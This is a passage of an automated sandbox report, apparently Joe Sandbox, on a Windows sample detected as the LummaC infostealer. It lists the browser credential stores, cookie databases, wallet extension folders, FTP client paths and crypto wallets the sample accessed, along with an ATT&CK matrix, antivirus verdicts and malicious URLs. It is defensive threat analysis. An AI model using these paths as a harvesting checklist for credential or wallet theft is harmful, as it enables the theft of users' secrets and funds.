                Source: 3LUyRfIoKs.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2269059253.00000000013A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2269059253.00000000013A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: 3LUyRfIoKs.exeString found in binary or memory: Wallets/Exodus
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2269059253.00000000013A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                Source: 3LUyRfIoKs.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: 3LUyRfIoKs.exeString found in binary or memory: keystore
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
                Source: Yara matchFile source: 00000000.00000003.2268452542.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 3LUyRfIoKs.exe PID: 5856, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: 3LUyRfIoKs.exe PID: 5856, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                Process Injection                		44
                Virtualization/Sandbox Evasion                		2
                OS Credential Dumping                		1
                Query Registry                		Remote Services1
                Archive Collected Data                		21
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Process Injection                		LSASS Memory861
                Security Software Discovery                		Remote Desktop Protocol41
                Data from Local System                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell                		Logon Script (Windows)Logon Script (Windows)11
                Deobfuscate/Decode Files or Information                		Security Account Manager44
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
                Obfuscated Files or Information                		NTDS2
                Process Discovery                		Distributed Component Object ModelInput Capture114
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets1
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials223
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                3LUyRfIoKs.exe60%VirustotalBrowse
                3LUyRfIoKs.exe66%ReversingLabsWin32.Trojan.CryptBot
                3LUyRfIoKs.exe100%AviraTR/Crypt.XPACK.Gen
                3LUyRfIoKs.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://bridge.sfon0%Avira URL Cloudsafe
                http://store.steampowered0%Avira URL Cloudsafe
                https://cdn.fastly.0%Avira URL Cloudsafe
                https://lev-tolstoi.com/ta100%Avira URL Cloudmalware
                https://login.s0%Avira URL Cloudsafe
                https://lev-tolstoi.com:443/apil100%Avira URL Cloudmalware
                https://bridge.sfo1.ap01.n0%Avira URL Cloudsafe
                https://checkout.steampow0%Avira URL Cloudsafe
                https://login.steamp0%Avira URL Cloudsafe
                https://lev-tolstoi.com/apix100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                steamcommunity.com
                		23.55.153.106
                		truefalse
                  		high
